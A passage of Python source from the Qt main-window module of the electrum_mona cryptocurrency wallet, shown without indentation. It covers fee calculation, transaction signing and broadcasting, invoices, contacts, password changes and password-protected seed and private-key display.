self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.is_onchain:
return
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs = self.read_outputs()
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + '\t' + "%s"%x.get('address') + '\t'
for coin in self.pay_from:
item = QTreeWidgetItem([format(coin), self.format_amount(coin['value'])])
item.setFont(0, QFont(MONOSPACE_FONT))
self.from_list.addTopLevelItem(item)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
@protected
def protect(self, func, args, password):
return func(*args, password)
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_outputs(self):
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice):
amount_sat = self.amount_e.get_amount()
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
try:
self.wallet.lnworker.pay(invoice, amount_sat, attempts)
except Exception as e:
self.show_error(str(e))
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, key, status):
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
def on_invoice_status(self, key, status, log):
if key not in self.wallet.invoices:
return
self.invoice_list.update_item(key, status, log)
if status == PR_PAID:
self.show_message(_('Payment succeeded'))
self.need_update.set()
elif status == PR_FAILED:
self.show_error(_('Payment failed'))
else:
pass
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self.is_onchain:
invoice = self.payto_e.lightning_invoice
if not invoice:
return
if not self.wallet.lnworker:
self.show_error(_('Lightning is disabled'))
return
return self.wallet.lnworker.parse_bech32_invoice(invoice)
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(outputs, message, self.payment_request, self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_preview(self):
self.do_pay(preview=True)
def do_pay(self, preview=False):
invoice = self.read_invoice()
if not invoice:
return
if not preview:
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_pay_invoice(invoice, preview)
def do_pay_invoice(self, invoice, preview=False):
if invoice['type'] == PR_TYPE_LN:
self.pay_lightning_invoice(invoice['invoice'])
return
elif invoice['type'] == PR_TYPE_ONCHAIN:
message = invoice['message']
outputs = invoice['outputs']
else:
raise Exception('unknown invoice type')
if run_hook('abort_send', self):
return
outputs = [TxOutput(*x) for x in outputs]
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x: x.value, outputs))
fee = tx.get_fee()
#use_rbf = bool(self.config.get('use_rbf', True))
#if use_rbf:
# tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, message)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
self.do_clear()
if not tx.is_complete():
self.show_transaction(tx)
else:
self.broadcast_transaction(tx, message)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
key = pr.get_id()
#self.wallet.set_invoice_paid(key, tx.txid())
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
@protected
def open_channel(self, *args, **kwargs):
def task():
return self.wallet.lnworker.open_channel(*args, **kwargs)
def on_success(chan):
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
self.show_message(message)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(e))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and invoice['status'] == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
from electrum_mona.lnaddr import lndecode, LnDecodeException
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.amount is not None:
self.amount_e.setAmount(lnaddr.amount * COIN)
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self.is_onchain = b
self.preview_button.setEnabled(b)
self.max_button.setEnabled(b)
self.show_send_tab_onchain_fees(b)
def show_send_tab_onchain_fees(self, b: bool):
self.feecontrol_fields.setEnabled(b)
#self.fee_e_label.setVisible(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.is_onchain = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.set_onchain(len(coins) > 0)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
invoice = self.wallet.get_invoice(key)
if invoice is None:
self.show_error('Cannot find payment request in wallet.')
return
bip70 = invoice.get('bip70')
if bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(bip70))
pr.verify(self.contacts)
self.show_bip70_details(pr)
def show_bip70_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("BIP70 Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.wallet.delete_invoices(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def pay_bip70_invoice(self, key):
pr = self.wallet.get_invoice(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.storage.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum_mona,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
if self.wallet.has_lightning():
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
sb.addPermanentWidget(self.lightning_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum_mona.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def disable_lightning(self):
warning = _('This will delete your lightning private keys')
r = self.question(_('Disable Lightning payments?') + '\n\n' + warning)
if not r:
return
self.wallet.remove_lightning()
self.show_warning(_('Lightning keys have been removed. This wallet will be closed'))
self.close()
def enable_lightning(self):
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
r = self.question(_('Enable Lightning payments?') + '\n\n' + _('WARNINGS') + ': ' + '\n\n' + warning1 + '\n\n' + warning2)
if not r:
return
self.wallet.init_lightning()
self.show_warning(_('Lightning keys have been initialized. This wallet will be closed'))
self.close()
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
if self.wallet.has_lightning():
lightning_b = QPushButton(_('Disable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.disable_lightning)
lightning_label = QLabel(_('Enabled'))
lightning_b.setDisabled(bool(self.wallet.lnworker.channels))
#else:
#lightning_b = QPushButton(_('Enable'))
#lightning_b.clicked.connect(dialog.close)
#lightning_b.clicked.connect(self.enable_lightning)
#lightning_label = QLabel(_('Disabled'))
#grid.addWidget(QLabel(_('Lightning')), 5, 0)
#grid.addWidget(lightning_label, 5, 1)
#grid.addWidget(lightning_b, 5, 2)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
# only show the combobox if multiple master keys are defined
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btns = run_hook('wallet_info_buttons', self, dialog) or Buttons(CloseButton(dialog))
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
